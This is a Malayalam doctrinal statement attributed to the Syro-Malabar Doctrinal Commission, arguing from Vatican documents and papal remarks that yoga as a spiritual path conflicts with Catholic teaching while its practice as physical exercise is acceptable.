യോഗയും കത്തോലിക്കാ വിശ്വാസവും

സീറോമലബാര്‍ ഡോക്ട്രൈനല്‍ കമ്മീഷന്‍

1. ശാരീരിക മാനസിക ആത്മീയതലങ്ങളെ ഒരുമിപ്പിച്ചുകൊണ്ട് അനുഷ്ഠിക്കുന്ന വ്യായാമമുറകളാണ് ഭാരതീയയോഗാശാസ്ത്രം പ്രത്യക്ഷത്തില്‍ അവതരിപ്പിക്കുന്നത്. എന്നാല്‍ യോഗയുടെ മറവില്‍ വര്‍ഗ്ഗീയരാഷ്ട്രീയവും ഹിന്ദുത്വ അജണ്ടയും ലക്ഷ്യമാക്കി അന്തര്‍ദേശീയതലത്തില്‍ യോഗ പ്രചരിപ്പിക്കാന്‍ സംഘപരിവാര്‍ മുന്നിട്ടിറങ്ങുന്ന സാഹചര്യത്തില്‍ യോഗാനുഷ്ഠാനങ്ങളെ പുനര്‍വായനയ്ക്കു വിധേയമാക്കാന്‍ ക്രിസ്തീയ വിശ്വാസികള്‍ നിര്‍ബന്ധിതരായിരിക്കുകയാണ്. സ്കൂള്‍തലം, മുതല്‍ യോഗയെ പാഠ്യപദ്ധതിയിലെ നിര്‍ബന്ധിത വിഷയമാക്കാനുള്ള ശ്രമവും യോഗയെ ഭാരതസംസ്കാരത്തിന്‍റെ ഏകതാനതയായി അവതരിപ്പിക്കാനുള്ള അഭൂതപൂര്‍വ്വമായ സര്‍ക്കാര്‍തല നീക്കങ്ങളും ഇപ്രകാരമൊരു പുനര്‍വായനയ്ക്ക് ആക്കം കൂട്ടുന്നുണ്ട്.

യോഗയുടെ ചരിത്രം

2. പുരാതന ഭാരതീയ മതങ്ങളായ ഹിന്ദുമതം, ജൈനമതം, ബുദ്ധമതം എന്നിവയുടെ വിശ്വാസങ്ങളും അനുഷ്ഠാനങ്ങളും രൂപപ്പെടുന്നതിനുമുമ്പുതന്നെ യോഗ ഇന്നാട്ടില്‍ പ്രചാരത്തിലുണ്ടായിരുന്നുവെന്ന അനുമാനത്തിലേക്കാണ് സിന്ധുനദീതട സംസ്കാരത്തിന്‍റെ പുരാവസ്തുപഠനം നമ്മെ നയിക്കുന്നത്. മതനിരപേക്ഷമായ പുരാതന ഭാരതീയ സംസ്കാരത്തിന്‍റെ തനത് അനുഷ്ഠാനങ്ങളും ആത്മീയ അഭ്യാസങ്ങളുമാവണം പില്‍ക്കാലത്ത് യോഗശാസ്ത്രമായി വളര്‍ന്നത്. യോഗയ്ക്ക് താത്ത്വികമായ വ്യാഖ്യാനം നല്‍കി ശാസ്ത്രീയമായി വീണ്ടെടുത്ത് സാര്‍വ്വത്രിക സ്വഭാവമുള്ള ഒരു സമഗ്ര ആത്മീയ പരിശീലനപദ്ധതിയായി പുനരവതരിപ്പിച്ചത് പതഞ്ജലി മഹര്‍ഷിയാണ്. ആത്മീയ യാഥാര്‍ത്ഥ്യങ്ങളെയും അനുഭവങ്ങളെയും അംഗീകരിക്കുമ്പോഴും സ്രഷ്ടാവും പരിപാലകനും ജീവതലക്ഷ്യവുമായ ഒരു ഈശ്വരന്‍ യോഗയില്‍ ഇല്ല. ബ്രഹ്മണമേധാവിത്വം ഉണ്ടായിരുന്ന പില്‍ക്കാലത്ത് പതഞ്ജലിയുടെ യോഗയും ഹൈന്ദവമതത്തിന് അധീനമായാണ് വളര്‍ന്നതും പ്രചരിച്ചതും. യോഗയുടെ പ്രബോധനങ്ങള്‍ക്കും അഭ്യാസങ്ങള്‍ക്കും ഭാരതീയ മതാത്മകതയുടെ പ്രത്യേകിച്ച്, ബ്രഹ്മണമേധാവിത്വമുള്ള ഹൈന്ദവ മതാത്മകതയുടെ പരിവേഷം കൈവന്നു.

3. സമീപകാലത്ത് ചില പൊന്തിഫിക്കല്‍ കൗണ്‍സിലുകളും കോണ്‍ഗ്രിഗേഷനുകളും പ്രസിദ്ധീകരിച്ച രേഖകള്‍ (പ്രധാനമായും വിശ്വാസ തിരുസംഘം 1989 ഒക്ടോബര്‍ 15 ന് പുറപ്പെടുവിച്ച മാര്‍ഗ്ഗരേഖ – Orationis Formas, നവയുഗ പ്രസ്ഥാനങ്ങളെക്കുറിച്ച് 2003 ല്‍ വത്തിക്കാന്‍ പുറത്തിറക്കിയ പ്രബോധനരേഖ – Jesus Christ, the bearer of the water of Life: A Christian Reflection on the New Age, യുവജനങ്ങള്‍ക്കായുള്ള സഭയുടെ മതബോധന ഗ്രന്ഥം – യു-കാറ്റ് എന്നീ പ്രബോധനരേഖകള്‍ യോഗയെക്കുറിച്ചുള്ള ചില വ്യക്തമായ ആശങ്കകള്‍ പങ്കുവയ്ക്കുന്നുണ്ട്.

4. വിശ്വാസ തിരുസംഘം പുറപ്പെടുവിച്ച മാര്‍ഗ്ഗരേഖയിലെ (Orationis Formas) നിര്‍ദ്ദേശവും ശ്രദ്ധാര്‍ഹമാണ്: “വേണ്ടരീതിയില്‍ ശാരീരിക ചേഷ്ടതകളെ മനസിലാക്കിയില്ലെങ്കില്‍ അതുതന്നെ ഒരു വിഗ്രഹമായി മാറാം. അത് നമ്മുടെ ആത്മാവിനെ ദൈവത്തിങ്കലേക്ക് ഉയര്‍ത്തുന്നതിന് തടസ്സമാകും. ശാരീരിക ചേഷ്ടയെ മുന്‍നിര്‍ത്തി പ്രാര്‍ത്ഥനയെ നയിക്കുന്നത് വളരെ ബുദ്ധിമുട്ടേറിയതാണ്. അത് ശരീരത്തിന്‍റെ ഒരു ഭ്രമമായി അധഃപതിക്കുകയും എല്ലാ ശാരീരിക അനുഭവങ്ങളും ആത്മീയാനുഭവങ്ങളായി തെറ്റിദ്ധരിക്കപെടാനും സാദ്ധ്യതയുണ്ട്.” യോഗയിലൂടെ അനുഭവപ്പെടുന്ന ശാരീരിക അനുഭവങ്ങളെ പരിശുദ്ധാത്മാവിന്‍റെ ആധികാരികമായ ആശ്വസിപ്പിക്കലുകളാണ് എന്ന് തെറ്റിദ്ധരിക്കരുതെന്നും ഈ പ്രബോധനരേഖ മുന്നറിയിപ്പു നല്‍കുന്നു.

5. യുവജനങ്ങള്‍ക്കായുള്ള സഭയുടെ മതബോധന ഗ്രന്ഥത്തില്‍ (യു-കാറ്റ്) യോഗയെ നിഗൂഢവിദ്യകളുടെ ഗണത്തിലാണ് ഉള്‍പ്പെടുത്തിയിരിക്കുന്നത്. യോഗ ക്രൈസ്തവവിശ്വാസവുമായി ഒത്തുപോകുമോ എന്ന ചോദ്യത്തിന് ഇല്ല എന്ന ഉത്തരമാണ് യു-കാറ്റ് നല്‍കുന്നത്. യു-കാറ്റ് തുടരുന്നു: “പലരും ആരോഗ്യപരമായ കാരണങ്ങളാല്‍ യോഗ അഭ്യസിക്കുന്ന ധ്യാനപദ്ധതിയില്‍ ചേരുന്നുണ്ട്. ചിലര്‍ നൃത്തപരിശീലനപദ്ധതിയില്‍ ചേരുന്നു. പുതിയ രീതിയില്‍ തങ്ങളുടെ ശരീരങ്ങളെ അനുഭവിക്കാന്‍ വേണ്ടിതന്നെയാണിത്. ഈ സാങ്കേതികവിദ്യ എപ്പോഴും ദോഷരഹിതമല്ല. പലപ്പോഴും ക്രിസ്തു മതത്തിന് അന്യമായ സിദ്ധാന്തങ്ങളിലേക്കുള്ള വാഹനങ്ങളാണവ. വിവേകമുള്ള ഒരു വ്യക്തിയും യുക്തി രഹിതമായ ലോകവീക്ഷണം പുലര്‍ത്തരുത്.”

6. യോഗയെക്കുറിച്ചുള്ള സംവാദങ്ങള്‍ക്ക് നവീനമാനം നല്‍കാന്‍ പര്യാപ്തമായിരുന്നു ഫ്രാന്‍സീസ് മാര്‍പാപ്പായുടെ യോഗയെക്കുറിച്ചുള്ള വിലയിരുത്തല്‍: “നിങ്ങള്‍ക്ക് ആയിരക്കണക്കിന് മതബോധന ക്ലാസ്സുകളും ആദ്ധ്യാത്മിക പരിശീലന പദ്ധതികളും ആയിരകണക്കിന് യോഗാ, സെന്‍ പരിശീലനങ്ങളും ആര്‍ജിക്കാം. എന്നാല്‍ ദൈവമക്കളുടെ സ്വാതന്ത്ര്യത്തിലേക്കു നിങ്ങളെ നയിക്കാന്‍ ഇവയ്ക്കൊന്നും കഴിവില്ല. ദൈവത്തെ പിതാവേ എന്നു വിളിക്കാന്‍ നമ്മുടെ ഹൃദയങ്ങളെ പരിപോഷിപ്പിക്കാന്‍ പരിശുദ്ധാത്മാവിനു മാത്രമേ കഴിയൂ. നിങ്ങളുടെ ഹൃദയകാഠിന്യവും മാലിന്യവും നീക്കി ദൈവഹിതത്തിന് വിധേയപ്പെടാന്‍ പര്യാപ്തമാക്കുന്നത് പരിശുദ്ധാത്മാവു മാത്രമാണ്.”
ഏതാനും മാസങ്ങള്‍ക്കുശേഷം നല്‍കിയ മറ്റൊരു അഭിമുഖത്തില്‍ മാര്‍പാപ്പ യോഗയെക്കുറിച്ച് വീണ്ടും സംസാരിക്കുകയുണ്ടായി: “ആധ്യാത്മിക ഉത്തരങ്ങള്‍ ആരും യോഗാക്ലാസ്സില്‍ അന്വേഷിക്കേണ്ടതില്ല. ഇതരമതങ്ങളുടെ ആത്മീയാഭ്യാസങ്ങള്‍ അനുകരിക്കുമ്പോള്‍ ആത്മീയമായ അപകട സാധ്യത കൂടുതലാണ്; ഏതു ലക്ഷ്യത്തിലേക്കാണ് നിങ്ങളുടെ ആത്മാവ് നയിക്കപ്പെടുന്നത് എന്നത് അവ്യക്തമായിതുടരുന്നു. തിന്മയുടെ അരൂപി ഏതു വിധേനയും നമ്മെ കീഴ്പ്പെടുത്താം. യോഗ അനുഷ്ഠിക്കുന്നവരെല്ലാം എല്ലായ്പ്പോഴും എല്ലായിടത്തും തിന്മയുടെ പിടിയിലാണെന്ന് ഞാന്‍ അര്‍ത്ഥമാക്കുന്നില്ല. എന്നാല്‍ യോഗാഭ്യാസത്തില്‍ ആത്മീയ അപകടസാധ്യത അധികമാണെന്നത് വസ്തുതയാണ്.”

പൗരസ്ത്യമായ പ്രാര്‍ത്ഥനാരീതി?

7. പൗരസ്ത്യമായ പ്രാര്‍ത്ഥനാരീതികളെല്ലാം ഹീനമാണെന്ന മുന്‍ധാരണയോടെ യോഗയെ സമീപിക്കുന്നത് കത്തോലിക്കാ വീക്ഷണത്തിനു നിരക്കുന്നതല്ല. ദൈവരാജ്യത്തിന്‍റെ പ്രവര്‍ത്തനങ്ങള്‍ക്കായര്‍പ്പിക്കുവാന്‍ സഹായിക്കുന്ന പരിശീലനപദ്ധതികള്‍ ഭാരതീയ സംസ്കാരത്തില്‍ നിന്ന് കണ്ടെടുക്കാന്‍ കഴിഞ്ഞാല്‍ അത് ക്രിസ്തീയതയ്ക്ക് ഒരു വലിയ മുതല്‍ക്കൂട്ടായിരിക്കും. ഗ്രീക്ക്-ലത്തീന്‍ സംസ്കാരങ്ങളില്‍ നിന്ന് പല കാര്യങ്ങളും ക്രിസ്തീയതയ്ക്ക് സ്വീകരിക്കാനായത് സഭയെ അനസ്യൂതം നയിച്ചുകൊണ്ടിരിക്കുന്ന ദൈവത്തിന്‍റെ പരിപാലനയുടെ ഭാഗമായിട്ടാണ് കത്തോലിക്കര്‍ എന്നും മനസിലാക്കിവന്നിട്ടുള്ളത്. സമാനമായ സാംസ്കാരിക കൊടുക്കല്‍-വാങ്ങലുകള്‍ ഭാരതത്തില്‍ നടത്താന്‍ സഭയ്ക്ക് കടമയുണ്ടെന്ന് വി. ജോണ്‍ പോള്‍ പാപ്പ എടുത്തു പറയുന്നു: “എന്‍റെ ചിന്ത പെട്ടെന്ന് പൗരസ്ത്യനാടുകളിലേയ്ക്ക് തിരിയുന്നു. മഹത്തായ പൗരാണിക കാലത്തിന്‍റെ മതപരവും തത്വശാസ്ത്രപരവുമായ പാരമ്പര്യങ്ങള്‍ക്കൊണ്ട് ഏറെ സമ്പന്നമാണവ. ആ നാടുകളുടെയിടത്തിനുചേര്‍ന്ന ഘടകങ്ങളെ സ്വീകരിക്കുക ക്രിസ്ത്യാനികളുടെ കടമയാണ്.” പാപ്പായുടെ അഭിപ്രായത്തില്‍ എല്ലാ മതങ്ങളിലെയും മനുഷ്യചൈതന്യത്തിന്‍റെ മൗലികാവശ്യങ്ങള്‍ ഒന്നുതന്നെയാണ്. ഭാരതീയ സംസ്കാരവുമായി സംവദിക്കുമ്പോള്‍ ഗ്രീക്ക്-ലത്തീന്‍ ചിന്തയുടെ ലോകത്തില്‍നിന്ന് സാംസ്കാരിക അനുരൂപണംവഴി സമ്പാദിച്ചവ സഭയ്ക്ക് ഉപേക്ഷിക്കാനാവില്ല. ഭാരതീയമായ ആത്മീയ ശൈലികളെ എത്രമേല്‍ ആദരവോടെയാണ് സഭ വിവക്ഷിക്കുന്നത് എന്ന് മേല്‍പ്പറഞ്ഞ പ്രസ്ഥാവനയില്‍നിന്നും വ്യക്തമാണ്.

8. യോഗയോടുള്ള സഭയുടെ വിയോജിപ്പ് അതിന്‍റെ പൗരസ്ത്യമോ വിജാതീയമോ ആയ ഉത്ഭവം മൂലമല്ല. പൗരസ്ത്യ ആദ്ധ്യാത്മിക സരണികളില്‍ നിന്നാണ് ക്രിസ്തീയതയുടെ ആത്മീയശൈലികളില്‍ ഭൂരിഭാഗവും ഉത്ഭവിച്ചത്. ക്രിസ്തീയപാരമ്പര്യത്തിനു വെളിയില്‍ ഉത്ഭവിച്ചു എന്നതിനെമാത്രം ആധാരമാക്കി ഒരു ആധ്യാത്മിക ശൈലിയുടെ ആധികാരികത വിലയിരുത്തുന്നതിലും അര്‍ത്ഥമില്ല. ഇത്തരം പ്രാര്‍ത്ഥനാരീതികളുടെ ആത്മാര്‍ത്ഥതയെ രണ്ടാംവത്തിക്കാന്‍ കൗണ്‍സില്‍ അംഗീകരിച്ച് ഏറ്റുപറയുന്നുണ്ട് (NA 2). അതിനാല്‍ ഭാരതീയ ആധ്യാത്മിക ശൈലിയോടും പൗരസ്ത്യമായതിനോടുമുള്ള എതിര്‍പ്പായി വ്യാഖ്യാനിച്ച് യോഗയോടുള്ള സഭയുടെ എതിര്‍പ്പിനെ നിസാരവത്ക്കരിക്കാനാവില്ല. ഭാരതീയമായ ആചാരാനുഷ്ഠാനങ്ങളോടും സാംസ്കാരിക അനുരൂപണങ്ങളോടും അങ്ങേയറ്റം തുറവിയോടെ സമീപിച്ചിട്ടുള്ള സഭ യോഗയെ അനുകൂലിക്കുന്നതിന് സുചിന്തിതമായ കാരണങ്ങളുണ്ട്.

9. വ്യക്തമായ ഈശ്വര സങ്കല്പങ്ങളും, ലോകവീക്ഷണവും ആരാധനാരീതികളും വിശുദ്ധഗ്രന്ഥങ്ങളും, പുണ്യസ്ഥലങ്ങളുമൊക്കെയുള്ള ആധുനിക ഹിന്ദുമതം യോഗയെ മതാത്മകമായി സ്വാംശീകരിച്ചെടുത്തവിധത്തില്‍തന്നെ ലോകത്തില്‍ പ്രചരിപ്പിക്കുമ്പോള്‍ സ്വീകരിക്കാന്‍ ക്രൈസ്തവമനസാക്ഷി ഒരുവനെ അനുവദിക്കില്ല. അന്ധമായ അനുകരണം വിശ്വാസവീക്ഷണപരവും ആത്മീയ അനുഭവപരവുമായ പൊരുത്തക്കേടുകള്‍ക്ക് വഴിതെളിക്കും.

ദൈവശാസ്ത്ര പ്രതിസന്ധികള്‍

10. ക്രിസ്തീയ വിശ്വാസത്തിന് എതിരായി യോഗ ഉയര്‍ത്തുന്ന ചില ദൈവശാസ്ത്ര പ്രതിസന്ധികള്‍ ചുവടെ ചേര്‍ക്കുന്നു:
1. യോഗയുടെ ദൈവശാസ്ത്രം കത്തോലിക്കാവിശ്വാസ സംഹിതകളുമായി ഒരിക്കലും ഒത്തുപോകുന്നതല്ല. യോഗിയും പ്രപഞ്ചവും പ്രപഞ്ചാതീതശക്തിയും ഒന്നായിത്തീരുന്ന അനുഭവമാണ് യോഗയില്‍ സംഭവിക്കുന്നത്. എന്നാല്‍ ക്രിസ്തീയ വിശ്വാസമനുസരിച്ച് കൂട്ടായ്മയിലായിരിക്കാന്‍ വിളിക്കപ്പെടുമ്പോഴും പ്രപഞ്ചത്തിനു ദൈവവുമായി ഒന്നാകാന്‍ (യോഗയിലായിരിക്കാന്‍) കഴിയില്ല. ഏകത്വവാദത്തിലൂന്നിയ (monism) യോഗയ്ക്ക് ക്രൈസ്തവവിശ്വാസത്തിലെന്നതുപോലെ സ്രഷ്ടാവിനെയും സൃഷ്ടിയെയും വേര്‍തിരിക്കാനാവില്ല. വൈയക്തികമായ വ്യത്യാസങ്ങളെല്ലാം അസ്തമിക്കുന്ന ഒന്നാകലിന്‍റെ സായൂജ്യത്തെയാണ് യോഗ എന്നു വിളിക്കുന്നത്. കത്തോലിക്കാ വിശ്വാസത്തിനും ധാര്‍മ്മികതയ്ക്കും ദൈവികവെളിപാടിനും തികച്ചും അന്യമായ മേഖലകളിലേക്കാണ് യോഗയുടെ ദൈവശാസ്ത്രം മനുഷ്യനെ നയിക്കുന്നത്.
2. മനുഷ്യാവതാരം ചെയ്ത ദൈവപുത്രനായ ഈശോയെ ലോകംകണ്ട നല്ല ഗുരുക്കന്മാരിലൊരാളായും അവതാര പുരുഷനായും വിശദീകരിക്കുന്ന പ്രവണതയാണ് യോഗയില്‍ കാണുന്നത്. ക്രിസ്തുദൈവത്തിന്‍റെ ഏകജാതനും ലോകത്തിന്‍റെ ഏക രക്ഷകനുമാണ് എന്ന സത്യം വിസ്മരിക്കുന്നു എന്നതാണ് യോഗയുടെ അപകടം. യോഗാദര്‍ശനത്തില്‍ രക്ഷാകരപദ്ധതിയിലെ ക്രിസ്തുവിന്‍റെ ഏകതാനത (uniqueness) മനസിലാക്കാന്‍ മാര്‍ഗ്ഗമില്ല എന്ന ദൈവശാസ്ത്രപ്രതിസന്ധി അവശേഷിക്കുന്നുണ്ട്. വാസ്തവത്തില്‍ യോഗാ ദര്‍ശനമനുസരിച്ച് മനുഷ്യന് ഒരു രക്ഷകന്‍റെ ആവശ്യമില്ല.

11. കത്തോലിക്കാ പാരമ്പര്യത്തിലെ പ്രാര്‍ത്ഥനാ സങ്കലങ്ങളോടും ആധ്യാത്മിക ദര്‍ശനങ്ങളോടും ഒത്തുപോകുന്നതല്ല യോഗയുടെ ആത്മീയ മാര്‍ഗ്ഗങ്ങള്‍. യോഗയിലെ ദൈവസങ്കല്പം കേവലം ഒരു ശക്തിയാണെങ്കില്‍ ക്രിസ്തീയതയിലെ ദൈവം സ്നേഹമുള്ള വ്യക്തിയാണ്; പിതാവും പുത്രനും പരിശുദ്ധാത്മാവുമാണ്. യോഗയെ സംബന്ധിക്കുന്ന ഏറ്റവും അടിസ്ഥാനപരമായ ചോദ്യം യോഗാദര്‍ശനം ദൈവം വ്യക്തിയാണെന്ന സത്യം അംഗീകരിക്കുന്നുണ്ടോ എന്നതാണ്. വത്തിക്കാന്‍ മാര്‍ഗ്ഗരേഖ ചൂണ്ടിക്കാട്ടുന്നതുപോലെ “ക്രിസ്തീയ പ്രാര്‍ത്ഥന ദൈവം എന്ന വ്യക്തിയോടുള്ള സംവേദനമാണ്. വ്യക്തിനിഷേധപരവും സാധകനില്‍ മാത്രം കേന്ദ്രീകരിക്കുന്നതുമായ പ്രാര്‍ത്ഥനാശൈലികളില്‍ നിന്ന് ക്രിസ്തീയത എക്കാലവും അകലം സൂക്ഷിച്ചിരുന്നു. ഹഠയോഗയുടെ അനുഷ്ഠാനവിധികള്‍ ഉള്‍പ്പെടെ യോഗയുടെ എല്ലാത്തരം ആസനങ്ങളും ജ്ഞാനോദയം ലക്ഷ്യമാക്കി സ്വന്തം മനസിനെ ശാന്തമാക്കിയും തന്നില്‍ത്തന്നെ ശ്രദ്ധ കേന്ദ്രീകരിച്ചും മുന്നേറുന്ന ശക്തിയാണ് അനുവര്‍ത്തിക്കുന്നത്.”

12. രക്ഷയെകുറിച്ചുള്ള കത്തോലിക്കാവീക്ഷണവും യോഗയുടെ കാഴ്ചപ്പാടും വ്യത്യസ്തമാണ്.
1. നാം സ്വയം രക്ഷപ്രാപിക്കുകയല്ല, രക്ഷയെ ഈശോമിശിഹായിലുള്ള സൗജന്യദാനമായി അനുഭവിക്കുകയാണ് ചെയ്യുന്നത്. എന്നാല്‍ യോഗാദര്‍ശനത്തില്‍ നിരന്തരം സംസാരിക്കുന്നത് ആത്മസംതൃപ്തി, ആത്മസാക്ഷാത്കാരം, സ്വയം വിമോചനം തുടങ്ങിയവയെക്കുറിച്ചാണ്. ക്രിസ്തീയതയില്‍ സ്വയാര്‍ജ്ജിതമായ ആത്മസാക്ഷാത്കാരം രക്ഷയുടെ മാര്‍ഗ്ഗമല്ല.
2. പാപത്തെക്കുറിച്ചുള്ള വീക്ഷണത്തിലും യോഗാദര്‍ശനവും ക്രിസ്തീയചിന്തയും തമ്മില്‍ അന്തരമുണ്ട്. അറിവിലെ അപൂര്‍ണ്ണതയെ (അജ്ഞാനത്തെ) യാണ് പാപമായി വിവക്ഷിക്കുന്നത്. എന്നാല്‍ ക്രിസ്തീയ വീക്ഷണത്തില്‍ പാപം എന്നത് ദൈവദത്തമായ സ്വാതന്ത്ര്യത്തെ മനുഷ്യന്‍ ബോധപൂര്‍വം ദുര്‍വിനിയോഗം ചെയ്ത് ദൈവത്തിനും സഹോദരങ്ങള്‍ക്കും എതിരായി തിരിയുന്നതാണ്. പാപത്തെ കേവലം അജ്ഞതയായി അവതരിപ്പിക്കുമ്പോള്‍ പാപത്തിന്‍റെ വ്യക്തിപരമായ ഉത്തരവാദിത്വം അപ്രസക്തമാകുന്നു എന്ന പ്രതിസന്ധിയും യോഗയില്‍ അവശേഷിക്കുന്നുണ്ട്.

12. യോഗ കേവലമായൊരു ശാരീരിക വ്യായാമരീതിയാണെന്നു വാദിക്കുമ്പോഴും യോഗാനുഷ്ഠാനത്തിലൂടെ ഉളവാകുന്ന ഫലങ്ങളെ ആത്മീയഫലങ്ങളായി വ്യാഖ്യാനിക്കാനുള്ള അപകടസാധ്യതയുണ്ട്. യോഗാനുഷ്ഠാനങ്ങളെക്കുറിച്ച് വത്തിക്കാന്‍റെ വിശ്വാസകാര്യാലയം പുറപ്പെടുവിച്ച പ്രബോധനരേഖ സമാനമായ ആശങ്ക പങ്കുവയ്ക്കുന്നുണ്ട്. ശാരീരികാസനങ്ങളിലൂടെ അനുഭവവേദ്യമാകുന്ന അനുഭവങ്ങളെ ക്രിസ്തീയ മൗതികരുടെ (mystics) ആത്മീയാനുഭവങ്ങളുമായി താരതമ്യം ചെയ്യാനാവില്ല.

13. ബഹുമതസംസ്കാരത്തില്‍ യോഗാനുഷ്ഠാനങ്ങള്‍ മതസൗഹാര്‍ദ്ദം വളര്‍ത്താന്‍ സഹായകമാണെന്ന വാദവും അടിസ്ഥാനരഹിതമാണ്. യോഗയെ ഹിന്ദുമതത്തില്‍നിന്നും വേര്‍പ്പെടുത്തി വ്യാഖ്യാനിക്കാനുള്ള ക്രിസ്ത്യന്‍ സംരംഭങ്ങളോട് ഹൈന്ദവനേതാക്കള്‍ക്ക് കടുത്ത എതിര്‍പ്പുണ്ട്. ഹൈന്ദവരെ മതംമാറ്റാനുള്ള ഗൂഢനീക്കത്തിന്‍റെ ഭാഗമായും ഹൈന്ദവ ആചാരങ്ങളിലുള്ള അനാവശ്യ കടന്നുകയറ്റവുമായാണ് പല ഹൈന്ദവരും ക്രിസ്ത്യാനികളുടെ യോഗാ പ്രണയത്തെ വിലയിരുത്തുന്നത്.

ഉപസംഹാരചിന്തകള്‍

14. ഒരു ആത്മീയമാര്‍ഗ്ഗം എന്നനിലയില്‍ യോഗ ക്രിസ്തീയ വിശ്വാസവുമായി ഒത്തുപോകുന്നതല്ല. ദൈവം, രക്ഷ, പാപം, പ്രാര്‍ത്ഥന, ധ്യാനം, ധാര്‍മ്മികത തുടങ്ങിയ അടിസ്ഥാന മേഖലകളിലെല്ലാം യോഗയും ക്രൈസ്തവവിശ്വാസവും പരസ്പരവിരുദ്ധമായ വസ്തുകളാണ് പഠിപ്പിക്കുന്നത്. ഉത്ഭവത്തിലും സ്വഭാവത്തിലും പ്രയോഗത്തിലും ലക്ഷ്യത്തിലും ക്രിസ്തീയതയുമായി ഒത്തുപോകാത്ത യോഗയെ ഒരു ആത്മീയമാര്‍ഗ്ഗമായി അംഗീകരിക്കുന്നത് ക്രിസ്തീയവിശ്വാസത്തിനു ഹാനികരമാണ്.

14. എന്നാല്‍, യോഗയെ ഒരു ശാരീരിക വ്യായാമവുമായി സ്വീകരിക്കുന്നതില്‍ തെറ്റില്ല. യോഗയിലെ വ്യായാമ മുറകള്‍ ക്രിസ്തീയവിശ്വാസത്തിനു വിരുദ്ധമോ നരകശിക്ഷ ലഭിക്കുന്നതോ അല്ല. ആരോഗ്യസംരക്ഷണത്തിനായും ശ്വാസക്രമീകരണത്തിനായും യോഗ അനുഷ്ഠിക്കുന്നതില്‍ തെറ്റായതൊന്നുമില്ല. വത്തിക്കാന്‍ പ്രബോധനരേഖയും ഈ ആശയം അംഗീകരിക്കുന്നുണ്ട്. “പൗരസ്ത്യദേശങ്ങളില്‍ ഉത്ഭവിച്ച ധ്യാനരീതികളും ശാരീരിക ആസനങ്ങളും പ്രശ്നകലുഷിതമായ സാഹചര്യത്തില്‍ തകര്‍ന്ന ഹൃദയവുമായി ജീവിക്കുന്ന ആധുനിക മനുഷ്യര്‍ക്ക് പ്രയോജനകരമാണ്. പ്രശാന്തമാക്കപ്പെട്ട മനസ്സോടെയും ആന്തരികസമാധാനത്തോടെയും ദൈവതിരുമുമ്പിലായിരിക്കാന്‍ ഈ ധ്യാനരീതികള്‍ സഹായകമാണ്.”

15. ശാരീരിക വ്യായാമ മുറകള്‍ക്കപ്പുറം യോഗയെ ഒരു ധ്യാനരീതിയായോ ദൈവവചന വ്യാഖ്യാനരീതിയായോ മോക്ഷമാര്‍ഗ്ഗമായോ അവതരിപ്പിക്കുന്നത് കത്തോലിക്കാ വിശ്വാസത്തിന്‍റെ സമഗ്രതയ്ക്ക് ദൂരവ്യാപകമായ ദുരന്തഫലങ്ങള്‍ ഉളവാക്കും. വിശ്വാസം ആഴങ്ങള്‍ ശോഷിച്ച് കേവലം ഉപരിപ്ലവമായിത്തീരുന്ന കാലത്ത് വിശ്വാസത്തിന്‍റെ ഉറവിടങ്ങളിലേക്ക് തിരിച്ചുനടക്കാനും വിശ്വാസശാക്തീകരണത്തിനു വഴിയൊരുക്കാനുമാണ് സഭയുടെ മുഴുവന്‍ ശ്രദ്ധയും തിരിയേണ്ടത്. സുവിശേഷവത്ക്കരണം എന്ന മഹത്തായ ലക്ഷ്യത്തില്‍നിന്ന് സഭയുടെ ശ്രദ്ധ തിരിക്കുന്ന ആപേക്ഷികതയുടെ നിലപാടുകളിലൊന്നായി യോഗയെക്കുറിച്ചുള്ള ചര്‍ച്ചകള്‍ വഴിമാറുന്നുണ്ട്. കോറിന്തിലെ സഭ അഭിമുഖീകരിച്ച സമാനമായ ഒരു പ്രശ്നമായ വിഗ്രഹാര്‍പ്പിത ഭക്ഷണത്തെക്കുറിച്ച് പ്രതിപാദിക്കുമ്പോള്‍ പൗലോസ് ശ്ലീഹാ നല്‍കുന്ന നിര്‍ദ്ദേശത്തിന്‍റെ വെളിച്ചത്തില്‍ (1 കോറി 8:8-13) യോഗയെക്കുറിച്ചുള്ള വിചിന്തനം ഇപ്രകാരം ഉപസംഹരിക്കാം.

യോഗ നമ്മെ ദൈവത്തോട് അടുപ്പിക്കുന്നില്ല. യോഗ ചെയ്യുന്നതുകൊണ്ട് കൂടുതല്‍ അയോഗ്യരോ ചെയ്യാതിരുന്നതുകൊണ്ട് കൂടുതല്‍ യോഗ്യരോ ആകുന്നില്ല. വിവിധ സംസ്കാരങ്ങളില്‍ പ്രാവീണ്യമുണ്ടെന്നു കരുതുന്നവരുടെ അറിവ് ദുര്‍ബ്ബല മനസാക്ഷിയുള്ളവര്‍ക്ക് ഇടര്‍ച്ചയ്ക്ക് കാരണമാകരുത്. അത്തരം അറിവുകള്‍ ക്രിസ്തു ആര്‍ക്കുവേണ്ടി മരിച്ചുവോ ആ ബലഹീനസഹോദരര്‍ക്ക് നാശകാരണമാകുന്നു. സഹോദരങ്ങളുടെ ദുര്‍ബ്ബലമനസാക്ഷിയെ മുറിപ്പെടുത്തുന്നവര്‍ ക്രിസ്തുവിനെതിരെയാണു പാപംചെയ്യുന്നത്. അതിനാല്‍ യോഗ സഹോദര വിശ്വാസിക്ക് ഇടര്‍ച്ചയ്ക്കു കാരണമാകുന്നെങ്കില്‍ യോഗയെ പ്രോത്സാഹിപ്പിക്കാതിരിക്കുന്നതാണ് നല്ലത്. പണ്ഡിതരുടെ ജ്ഞാനതര്‍ക്കങ്ങളേക്കാള്‍ സാധാരണക്കാരന്‍റെ വിശ്വാസപോഷണത്തിനാണ് സഭ ഊന്നല്‍ നല്‍കേണ്ടത്.

